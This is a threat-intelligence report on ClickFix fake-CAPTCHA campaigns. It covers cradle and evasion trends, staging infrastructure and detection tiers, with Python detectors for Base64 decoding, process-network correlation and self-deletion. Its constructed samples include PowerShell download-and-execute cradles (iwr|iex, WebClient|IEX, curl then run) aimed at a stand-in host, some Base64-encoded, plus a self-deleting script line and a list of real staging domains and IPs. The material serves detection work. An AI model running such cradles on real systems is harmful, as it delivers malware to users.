ClickFix Delivery Chain — Trend Analysis

Data: MHaggis ClickGrab  ·  Period: Apr 2025 – Mar 2026  ·  493 nightly reports  ·  Generated: 2026-03-14

Headline counts (493 nightly reports):
  21k+    sites crawled
  20k+    malicious confirmed
  2114    IWR/IEX cradles
  10424   Base64 obfuscated
  866     self-delete
  411     CDN-staged payloads

Detection Chokepoint Framework

Six stages of the ClickFix delivery chain (the first, rendering the lure, happens entirely in the browser and produces no host telemetry). Not all stages are equally detectable: Tier 1 stages are adversary actions that remain unavoidable regardless of how the lure evolves.

Stage                  Mechanism                                   Detectability
Browser renders lure   Fake CAPTCHA / reCAPTCHA page               Not detectable on the host
JS → clipboard         execCommand("copy") writes the command      Pre-exec
Process spawn          Run dialog → cmd.exe → PowerShell           Tier 1
Network fetch          IWR / IRM / WebClient / Curl                Tier 1
Payload write          Script dropped to %TEMP%                    Tier 2
Execute + cleanup      Payload runs, then self-deletes             Tier 2/3

The Tier 1 chokepoints are process spawn and network fetch. Every cradle family must touch the network to retrieve the payload, and the unusual parent → PowerShell spawn is unavoidable because the user triggers execution by pasting into the Run dialog, which is hosted by explorer.exe (pasting into File Explorer's address bar yields the same parent). These are the detection bets that pay off regardless of lure evolution. See the ClickFix Techniques chokepoint for detection logic.

Monthly Volume — Malicious Sites Detected

Total sites crawled vs. confirmed malicious per month across 493 nightly ClickGrab scans.

(Chart: Sites crawled vs. malicious by month)

Tier 1 Chokepoint: Cradle Family Evolution

The network fetch is the unavoidable action. This chart shows how adversaries are fetching payloads — and how that method has shifted as defenders tuned IWR/IEX detections.

(Chart: Monthly cradle family distribution, by PowerShell download method)
Dec 2025 pivot: IWR/IEX drops sharply while WebClient (.NET) and Curl/Bash surge in the same month. Read that as a clear signal that IWR-specific detections were effective and adversaries rotated to alternatives. If your detection logic is iwr|Invoke-WebRequest pattern matching, coverage of this chain dropped significantly in Q4 2025, and it never covered the WebClient or Curl families at all.
Why this is still Tier 1: the fetch method changed from IWR to Curl/WebClient, but the chokepoint did not move. Any outbound connection to a staging URL from a PowerShell process spawned by a Run-dialog parent (explorer.exe, or cmd.exe launched from the Run dialog) remains the detection signal. One caveat for the rule author: in the Curl family the socket is opened by curl.exe, a child of the PowerShell process, so attribute network events to the process tree rather than to powershell.exe alone. Behavioral rules survive cradle rotation; method-specific string matching does not.

Evasion Technique Trends — Where Adversaries Are Adapting

These are the adversary adaptation signals in the trend data. A rising line marks a technique adopted in response to a detection that started working; a flat line with spikes marks campaign surges rather than adaptation.

(Chart: Monthly evasion technique prevalence, count of sites using each technique)
Self-delete: zero → hundreds in one month. From April to November 2025 there were zero recorded self-delete instances; from December 2025 self-delete appeared on hundreds of sites per month (866 total across the period). Before attributing a jump from exactly zero to adversary adaptation, confirm when the crawler began tagging the technique, since a new rule in the pipeline produces the same curve. Either way the defensive consequence holds: any rule that relies on finding the dropped script on disk sees nothing after execution, so correlate process execution with file-system events before cleanup completes (script block logging keeps the script text even after the file is gone).
Base64 explosion Jan 2026: Base64-encoded payloads increased ~18× vs. the April 2025 baseline. This defeats plaintext command inspection: IDS/SIEM rules matching raw PowerShell strings like iwr https:// see the encoded blob, not the decoded cradle. The two common forms decode differently: the -EncodedCommand launch flag carries UTF-16LE text, while in-script [Convert]::FromBase64String payloads are usually UTF-8. Detection must decode the payload before applying cradle rules, or detect the decode-and-execute act itself.
Mixed-case PowerShell declining: mixed-case variants (POWerShEll, PowErsHeLL) peaked in mid-2025, then trended down as Base64 encoding became the primary obfuscation method. If you added a case-insensitive PowerShell regex in response, you caught the technique as adversaries were already moving away from it; keep it, since it is cheap, but do not count it as coverage.
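To make the Base64 and mixed-case findings above concrete, here is an added example (not ClickGrab pipeline code and not part of the original report) that peels the two Base64 forms off a command line, the -EncodedCommand flag (UTF-16LE) and in-script [Convert]::FromBase64String (usually UTF-8), then classifies the cradle family on the decoded text with case-insensitive patterns. It also implements the Tier 2 decode-and-execute check recommended later on the page. The sample command lines are constructed, example.invalid stands in for a staging host, and the family regexes are my assumptions about how the three chart families are tokenised.

```python
"""Peel Base64 layers off a PowerShell command line and classify the cradle.

Added example, not ClickGrab pipeline code. Input is a process command line
(Sysmon EID 1 / Security 4688 style); the sample command lines are constructed.
"""
import base64
import re
from collections import Counter

# Cradle families tracked in this report (assumed tokens). Matched
# case-insensitively, so mixed-case variants (POWerShEll, iWr) need no extra rule.
CRADLE_FAMILIES = {
    "IWR/IEX":   r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b",
    "WebClient": r"net\.webclient|\.downloadstring\(|\.downloadfile\(",
    "Curl/Bash": r"\b(?:curl|wget)(?:\.exe)?\b|\bbash\b",
}
EXEC_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
# -EncodedCommand and the prefixes powershell.exe accepts; payload is UTF-16LE.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# In-script decode: [Convert]::FromBase64String('...'), normally UTF-8 text.
FROM_B64_RE = re.compile(r"(?i)FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
# The decode-then-execute act itself, in either order, within a short window.
DECODE_EXEC_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\b[\s\S]{0,300}?FromBase64String"
    r"|FromBase64String[\s\S]{0,300}?\b(?:iex|invoke-expression)\b")
PS_TOKEN_RE = re.compile(r"(?i)\bpowershell(?:\.exe)?\b")
CANONICAL_PS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}


def _b64_to_text(token: str) -> str:
    raw = base64.b64decode(token, validate=True)
    # UTF-16LE ASCII text has a NUL in every odd byte; choose the decoding from
    # the bytes rather than from which flag carried the token.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_layers(cmdline: str, max_depth: int = 4):
    """Replace each Base64 token with its plaintext. Returns (text, layers)."""
    text, layers = cmdline, 0
    for _ in range(max_depth):
        m = ENC_RE.search(text) or FROM_B64_RE.search(text)
        if not m:
            break
        try:
            plain = _b64_to_text(m.group(1))
        except ValueError:          # not valid Base64 (binascii.Error subclasses ValueError)
            break
        text = text[:m.start(1)] + plain + text[m.end(1):]
        layers += 1
    return text, layers


def classify(cmdline: str) -> dict:
    """Cradle family plus the obfuscation signals this report tracks."""
    text, layers = decode_layers(cmdline)
    families = [n for n, rx in CRADLE_FAMILIES.items() if re.search(rx, text, re.I)]
    ps = PS_TOKEN_RE.search(cmdline)
    token = re.sub(r"(?i)\.exe$", "", ps.group(0)) if ps else ""
    return {
        "family": families[0] if families else "Other",
        "base64_layers": layers,
        # Tier 2 signal: decode-and-execute, visible on the raw line or after peeling
        "decode_then_exec": bool(DECODE_EXEC_RE.search(cmdline))
                            or (layers > 0 and bool(EXEC_RE.search(text))),
        "mixed_case_powershell": bool(token) and token not in CANONICAL_PS,
        "decoded": text,
    }


def family_counts(cmdlines) -> Counter:
    """The chart's roll-up: how many command lines fall in each cradle family."""
    return Counter(classify(c)["family"] for c in cmdlines)


# Constructed samples. example.invalid is a reserved name, not a real staging host.
INNER_IWR = "iwr https://example.invalid/files/uploaded/a.txt | iex"
INNER_CURL = r"curl.exe -s https://example.invalid/x.ps1 -o $env:TEMP\x.ps1; & $env:TEMP\x.ps1"
DECODE_WRAPPER = "iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{}')))"


def _enc(text: str) -> str:   # what -EncodedCommand expects
    return base64.b64encode(text.encode("utf-16-le")).decode()


def _b64(text: str) -> str:   # what FromBase64String + UTF8.GetString expects
    return base64.b64encode(text.encode()).decode()


SAMPLE_CMDLINES = [
    'powershell -w hidden -c "' + INNER_IWR + '"',
    "powershell -w hidden -enc " + _enc(INNER_IWR),
    'powershell -c "' + DECODE_WRAPPER.format(_b64(INNER_CURL)) + '"',
    "powershell -enc " + _enc(DECODE_WRAPPER.format(_b64(INNER_CURL))),   # two layers
    'POWerShEll -w hidden -c "(New-Object Net.WebClient).DownloadString(\'https://example.invalid/p\')|IEX"',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = classify(line)
        print(f"{r['family']:10} layers={r['base64_layers']} decode+exec={r['decode_then_exec']} "
              f"mixed={r['mixed_case_powershell']}  {r['decoded'][:70]}")
    print(family_counts(SAMPLE_CMDLINES))
```

The decoder picks UTF-16LE or UTF-8 from the bytes rather than from the flag, because operators occasionally wrap UTF-16LE text in FromBase64String as well; run the family patterns only on the fully peeled text, never on the raw line.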

Staging Infrastructure

Domains serving the actual payloads (from PowerShell download commands). CDN-hosted payloads defeat domain-reputation blocking — the infrastructure looks like legitimate web hosting.

Domain / IP                        Payloads  Hosting type                                     Country  Status      Blind spot
irp.cdn-website.com                468       CDN (legitimate content delivery network)        -        Active      Domain-reputation blocklists ineffective (legitimate CDN provider)
yogasitesdev.wpengine.com          116       Managed WP hosting (likely compromised)          US       Active      Blocklisting removes legitimate sites
aatox.com                          83        Bulletproof (abuse-tolerant VPS / dedicated)     -        Taken down  -
80.253.249.186                     43        Bulletproof (abuse-tolerant VPS / dedicated)     -        Taken down  -
95.164.53.214                      16        Bulletproof (abuse-tolerant VPS / dedicated)     -        Taken down  -
91.247.36.3                        4         Bulletproof (abuse-tolerant VPS / dedicated)     -        Taken down  -
sitecariri.com.br                  2         Compromised (legitimate site abused as staging)  BR       Unknown     -
fundacion-cannabis-argentina.org   2         Compromised (legitimate site abused as staging)  AR       Unknown     -
ghenvironment.com                  2         Compromised (legitimate site abused as staging)  -        Unknown     -
cmparazinho.rn.gov.br              2         Compromised (legitimate site abused as staging)  BR       Unknown     -

Registration dates were not populated for any row at generation time.

ASN, geo and registration fields are filled in by analyze_clickgrab.py (via ip-api.com and RDAP) on the next pipeline run, which is why several rows above carry no country or registration value. Passive DNS history requires a SecurityTrails or similar account.

CDN-hosted staging defeats domain blocking. irp.cdn-website.com appeared in 411 payload fetches. It is a legitimate CDN used by website builders, so blocking it would impact legitimate sites. Detection must shift to behavioral signals (Run-dialog parent → PowerShell → network connection → unusual path on an otherwise benign host) rather than domain-reputation lookup.
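The behavioral signal described here and in the cradle-family section above, as an added example that is not part of the original report or the ClickGrab pipeline: a correlator over constructed Sysmon-shaped events that flags powershell.exe spawned by explorer.exe or cmd.exe, attributes network connections made by its children (curl.exe in the Curl/Bash family) back to it, and judges the destination by an assumed allowlist and, for *.cdn-website.com, by the /files/uploaded/*.ps1 path pattern rather than the domain. The allowlist suffixes, the 120 s fetch window, the scoring and the event field names are assumptions; the path check reads the command line, so an encoded command must be decoded before it is passed in.

```python
"""Tier 1 chokepoint: Run-dialog parent -> PowerShell spawn, correlated with the
outbound fetch, whatever cradle family performs it.

Added example, not ClickGrab code. Events are constructed in a Sysmon-like
shape (EID 1 ProcessCreate, EID 3 NetworkConnect). The URL path test reads the
command line, so it assumes a plaintext or already-decoded command line.
"""
import re
from datetime import datetime, timedelta

RUN_DIALOG_PARENTS = {"explorer.exe", "cmd.exe"}   # Run dialog, or cmd.exe launched from it
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed allowlist: destinations a PowerShell process reaches legitimately.
ALLOW_SUFFIXES = (".microsoft.com", ".windowsupdate.com", ".powershellgallery.com")
# Legitimate CDNs abused for staging: never block the domain, alert on the path.
CDN_SUFFIXES = (".cdn-website.com",)
CDN_PATH_RE = re.compile(r"/files/uploaded/[^\s'\"]*\.ps1\b", re.I)   # pattern from the report
PAYLOAD_EXT_RE = re.compile(r"\.(?:ps1|txt|hta)(?:[?#]|$)", re.I)
URL_RE = re.compile(r"""https?://([A-Za-z0-9.-]+)(/[^\s'")|;]*)?""", re.I)
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle|in|i)?\s+h(?:idden|id|i)?\b")
FETCH_WINDOW = timedelta(seconds=120)   # assumed: the fetch follows the spawn within two minutes


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def _base(image):
    return image.rsplit("\\", 1)[-1].lower()


def judge(host, cmdline):
    """Why a connection from a flagged process tree is suspicious, or None."""
    if host.endswith(ALLOW_SUFFIXES):
        return None
    paths = [p or "/" for h, p in URL_RE.findall(cmdline) if h.lower() == host]
    if host.endswith(CDN_SUFFIXES):
        # Domain reputation is useless here; the upload path is the signal. An
        # encoded command hides the URL, so decode it before calling this.
        return "cdn-staged-path" if any(CDN_PATH_RE.search(p) for p in paths) else None
    if any(PAYLOAD_EXT_RE.search(p) for p in paths):
        return "script-extension-fetch"
    return "non-allowlisted-destination"


def correlate(events):
    """One finding per flagged PowerShell process, highest score first."""
    procs, root_of, findings = {}, {}, {}
    for ev in sorted(events, key=lambda e: _ts(e["UtcTime"])):
        if ev["EventID"] == 1:
            procs[ev["ProcessGuid"]] = ev
            if _base(ev["Image"]) in POWERSHELL and _base(ev["ParentImage"]) in RUN_DIALOG_PARENTS:
                root_of[ev["ProcessGuid"]] = ev["ProcessGuid"]
                findings[ev["ProcessGuid"]] = {
                    "guid": ev["ProcessGuid"], "parent": _base(ev["ParentImage"]),
                    "hidden_window": bool(HIDDEN_RE.search(ev["CommandLine"])),
                    "fetch": None, "score": 0}
            elif ev["ParentProcessGuid"] in root_of:
                # curl.exe (or any helper) spawned by a flagged PowerShell inherits attribution
                root_of[ev["ProcessGuid"]] = root_of[ev["ParentProcessGuid"]]
        elif ev["EventID"] == 3 and ev["ProcessGuid"] in root_of:
            root = root_of[ev["ProcessGuid"]]
            f = findings[root]
            if f["fetch"] or _ts(ev["UtcTime"]) - _ts(procs[root]["UtcTime"]) > FETCH_WINDOW:
                continue
            host = ev["DestinationHostname"].lower()
            reason = judge(host, procs[root]["CommandLine"])
            if reason:
                f["fetch"] = {"host": host, "via": _base(ev["Image"]), "reason": reason}
    for f in findings.values():
        # The spawn alone is the Tier 1 hook; the fetch confirms it, the hidden flag adds weight.
        f["score"] = 1 + int(f["hidden_window"]) + (2 if f["fetch"] else 0)
    return sorted(findings.values(), key=lambda f: -f["score"])


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CURL = r"C:\Windows\System32\curl.exe"
CDN_CMD = r"curl.exe -s https://irp.cdn-website.com/files/uploaded/x.ps1 -o $env:TEMP\x.ps1; & $env:TEMP\x.ps1"
SAMPLE_EVENTS = [   # constructed; example.invalid is a reserved name
    {"EventID": 1, "UtcTime": "2026-02-03 10:00:00", "ProcessGuid": "P1", "ParentProcessGuid": "E1",
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/files/uploaded/a.txt | iex"'},
    {"EventID": 3, "UtcTime": "2026-02-03 10:00:02", "ProcessGuid": "P1", "Image": PS,
     "DestinationHostname": "example.invalid", "DestinationPort": 443},
    # Curl/Bash cradle via cmd.exe: the socket belongs to curl.exe, a child of the flagged PowerShell
    {"EventID": 1, "UtcTime": "2026-02-03 10:05:00", "ProcessGuid": "P2", "ParentProcessGuid": "C1",
     "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'powershell -w hidden -c "' + CDN_CMD + '"'},
    {"EventID": 1, "UtcTime": "2026-02-03 10:05:01", "ProcessGuid": "P2a", "ParentProcessGuid": "P2",
     "Image": CURL, "ParentImage": PS, "CommandLine": CDN_CMD},
    {"EventID": 3, "UtcTime": "2026-02-03 10:05:02", "ProcessGuid": "P2a", "Image": CURL,
     "DestinationHostname": "irp.cdn-website.com", "DestinationPort": 443},
    # A console opened from the Run dialog with no fetch: spawn-only, low score
    {"EventID": 1, "UtcTime": "2026-02-03 11:00:00", "ProcessGuid": "P3", "ParentProcessGuid": "E1",
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell"},
    # PowerShell from an editor reaching the gallery: parent is not a Run-dialog host
    {"EventID": 1, "UtcTime": "2026-02-03 11:10:00", "ProcessGuid": "P4", "ParentProcessGuid": "T1",
     "Image": PS, "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "powershell -NoLogo"},
    {"EventID": 3, "UtcTime": "2026-02-03 11:10:03", "ProcessGuid": "P4", "Image": PS,
     "DestinationHostname": "www.powershellgallery.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

The spawn-only finding (P3) is intentionally kept at the lowest score rather than dropped: on a fleet where users open consoles from the Run dialog it is noise, but it is the hook that the fetch then confirms, and a suppression of the bare spawn should be a tuning decision, not something the rule silently makes.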

Detection Recommendations

Prioritized by chokepoint tier. Tier 1 recommendations survive lure evolution, cradle rotation, and obfuscation changes.

TIER 1: Detect unusual parent → PowerShell spawn
Correlate explorer.exe or cmd.exe (the Run dialog's hosts) spawning powershell.exe, with extra weight for a window-hidden flag (-w hidden, -WindowStyle Hidden). This signal is constant regardless of cradle family rotation. See sigma-rules/clickfix/hunt.yml.

TIER 1: Cradle-agnostic network fetch detection
Move from IWR/IRM string matching to process+network correlation: a PowerShell process, or a child it spawned such as curl.exe, making an outbound HTTP/HTTPS connection to a domain outside your Microsoft/update allowlist, where the requested path ends in .ps1/.txt/.hta (known CDNs are handled by path, see the INFRA item). This catches IWR, Curl, WebClient, and any future cradle. Update Sigma rules to use process+network correlation, not command-string pattern matching. The path is visible in command-line, script-block or proxy telemetry, not in a TLS connection event, so the path condition has to be joined from one of those sources.

TIER 2: Detect Base64 decode + execute
[Convert]::FromBase64String or [Text.Encoding]::UTF8.GetString followed (or preceded) by iex / Invoke-Expression, plus the -EncodedCommand (-enc, -e) launch flag, whose payload is UTF-16LE rather than UTF-8. The encoding act itself is detectable even when the decoded content is not; decode the payload in the pipeline so the cradle rules can run on plaintext. This covers the 18× Base64 increase seen in Jan 2026.

TIER 2: File write → execute → delete correlation (new Dec 2025)
Self-delete appeared at scale in December 2025. Correlate: script written to %TEMP% → process execution from that path → file deletion within seconds. If artifact-based rules are your only coverage, they are now blind once execution completes. Use process execution telemetry, and script block logging, which records the script text before the file is removed, not file presence.

INFRA: CDN staging, pivot from domain blocking to path-pattern detection
irp.cdn-website.com is a legitimate CDN. Block it and you break legitimate sites. Instead, alert on PowerShell fetching from *.cdn-website.com paths matching /files/uploaded/*.ps1. JA4 client fingerprinting is a complementary signal: it identifies the TLS client (PowerShell's .NET stack or curl.exe rather than a browser) independently of the destination hostname, but it says nothing about the destination, so use it alongside the process-tree correlation rather than instead of it.
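The write → execute → delete correlation from the Tier 2 recommendation above (and the self-delete finding in the evasion section), as an added example that is not ClickGrab code: it joins constructed Sysmon-shaped FileCreate, ProcessCreate and FileDelete events on the dropped path, uses PowerShell 4104 script block text to catch the self-delete idiom (Remove-Item on $MyInvocation.MyCommand.Path or $PSCommandPath) even when no delete event ever arrives, and reports which stages of each chain were observed. The Temp path pattern, the 30 s cleanup window, the extension list and the sample events are assumptions.

```python
"""Tier 2: script written to %TEMP% -> executed from that path -> deleted within
seconds, plus the self-delete idiom inside the script block text.

Added example, not ClickGrab code. Events are constructed in a Sysmon-like
shape (EID 11 FileCreate, EID 1 ProcessCreate, EID 23/26 FileDelete) plus
PowerShell EID 4104 ScriptBlockText; paths and timings are assumed.
"""
import re
from datetime import datetime, timedelta

# Assumed: dropped payloads land under a Temp directory with a script extension.
TEMP_SCRIPT_RE = re.compile(r"(?i)\\temp\\[^\\]+\.(?:ps1|hta|bat|cmd|vbs|js)$")
# Self-delete idioms: remove the running script via PowerShell's automatic variables.
SELF_DELETE_RE = re.compile(
    r"(?i)(?:remove-item|\bri\b|\bdel\b|\brm\b)[^;\n]*"
    r"\$(?:MyInvocation\.MyCommand\.(?:Path|Definition)|PSCommandPath)")
CLEANUP_GAP = timedelta(seconds=30)   # assumed: cleanup follows the write within 30 s


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def correlate_self_delete(events, gap=CLEANUP_GAP):
    """One record per Temp script: which stages were seen and whether the chain completed."""
    chains = {}   # lowercased path -> record
    for ev in sorted(events, key=lambda e: _ts(e["UtcTime"])):
        eid, t = ev["EventID"], _ts(ev["UtcTime"])
        if eid == 11 and TEMP_SCRIPT_RE.search(ev["TargetFilename"]):
            chains[ev["TargetFilename"].lower()] = {
                "path": ev["TargetFilename"], "writer": ev["Image"].rsplit("\\", 1)[-1],
                "written": t, "executed": None, "exec_guid": None, "intent": False, "deleted": None}
        elif eid == 1:
            cl = ev["CommandLine"].lower()
            for path, c in chains.items():
                if c["executed"] is None and path in cl:
                    c["executed"], c["exec_guid"] = t, ev["ProcessGuid"]
        elif eid == 4104:
            # Script block logging keeps the script text even after the file is gone.
            c = chains.get(ev.get("Path", "").lower())
            if c and SELF_DELETE_RE.search(ev["ScriptBlockText"]):
                c["intent"] = True
        elif eid in (23, 26):
            c = chains.get(ev["TargetFilename"].lower())
            if c and c["deleted"] is None:
                c["deleted"] = t
    out = []
    for c in chains.values():
        delete_after = (c["deleted"] - c["written"]).total_seconds() if c["deleted"] else None
        # Complete chain: the script ran, and it either removed itself or was removed within the gap.
        complete = c["executed"] is not None and (
            c["intent"] or (delete_after is not None and delete_after <= gap.total_seconds()))
        out.append({"path": c["path"], "writer": c["writer"], "executed": c["executed"] is not None,
                    "exec_guid": c["exec_guid"], "self_delete_intent": c["intent"],
                    "deleted_after_s": delete_after, "complete": complete})
    return sorted(out, key=lambda r: not r["complete"])


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [   # constructed
    # ClickFix chain: the cradle writes svc.ps1, runs it hidden, and the script deletes itself
    {"EventID": 11, "UtcTime": "2026-02-03 10:00:03", "ProcessGuid": "P1", "Image": PS,
     "TargetFilename": TEMP + r"\svc.ps1"},
    {"EventID": 1, "UtcTime": "2026-02-03 10:00:04", "ProcessGuid": "P2", "Image": PS,
     "CommandLine": 'powershell -ep bypass -w hidden -f "' + TEMP + r'\svc.ps1"'},
    {"EventID": 4104, "UtcTime": "2026-02-03 10:00:04", "Path": TEMP + r"\svc.ps1",
     "ScriptBlockText": "Start-Process $env:TEMP\\upd.exe; Remove-Item -Force $MyInvocation.MyCommand.Path"},
    {"EventID": 23, "UtcTime": "2026-02-03 10:00:07", "ProcessGuid": "P2", "Image": PS,
     "TargetFilename": TEMP + r"\svc.ps1"},
    # Installer helper: written and run, never deleted
    {"EventID": 11, "UtcTime": "2026-02-03 11:00:00", "ProcessGuid": "P3",
     "Image": r"C:\Users\alice\Downloads\tool-setup.exe", "TargetFilename": TEMP + r"\setup.ps1"},
    {"EventID": 1, "UtcTime": "2026-02-03 11:00:01", "ProcessGuid": "P4", "Image": PS,
     "CommandLine": "powershell -f " + TEMP + r"\setup.ps1"},
    # Scratch file deleted without ever executing: not a chain
    {"EventID": 11, "UtcTime": "2026-02-03 12:00:00", "ProcessGuid": "P5", "Image": PS,
     "TargetFilename": TEMP + r"\scratch.ps1"},
    {"EventID": 26, "UtcTime": "2026-02-03 12:00:01", "ProcessGuid": "P5", "Image": PS,
     "TargetFilename": TEMP + r"\scratch.ps1"},
]

if __name__ == "__main__":
    for record in correlate_self_delete(SAMPLE_EVENTS):
        print(record)
```

The intent check matters in practice: Sysmon only emits FileDelete when that event type is configured, and a script that removes itself after the collector's window closes produces no delete event at all, whereas 4104 captures the Remove-Item line at execution time regardless.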